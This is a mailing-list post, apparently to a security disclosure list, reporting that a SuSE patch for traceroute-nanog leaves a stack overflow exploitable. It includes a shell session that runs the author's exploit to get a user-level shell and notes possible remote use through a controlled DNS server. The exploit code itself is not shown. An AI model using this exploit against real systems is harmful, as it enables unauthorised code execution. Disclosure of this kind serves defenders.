Hi all, Further to my email posting a working exploit for traceroute-nanog on SuSE boxes, it would appear the the patch provided by SuSE does not address the overflow my exploit... um... exploits. On a patched SuSE 7.2 box: carl@titan:~/exploits/traceroute-nanog > rpm -qa | grep traceroute traceroute-6.1.1-0 carl@titan:~/exploits/traceroute-nanog > ./traceroute-exploit -d Now run this exploit with the '-e' flag. carl@titan:~/exploits/traceroute-nanog > ./traceroute-exploit -e traceroute to www.yahoo.akadns.net (64.58.76.230), 30 hops max, 40 byte packets 1 sh-2.05$ id uid=500(carl) gid=100(users) groups=100(users) sh-2.05$ Note that traceroute now drops root privileges (properly; there is no way to get them back), so even though it is still possible to execute arbitrary code via a stack overflow, it cannot be done as root. Of course, if an attacker could control the server that traceroute uses to lookup DNS admin contact names, then it would be possible to exploit this flaw remotely. However, the default server used by traceroute is 'localhost' which makes this almost impossible to exploit in any other way except locally on an unpatched system. Cheers, Carl.
This archive was generated by hypermail 2b30 : Mon Dec 02 2002 - 13:42:32 PST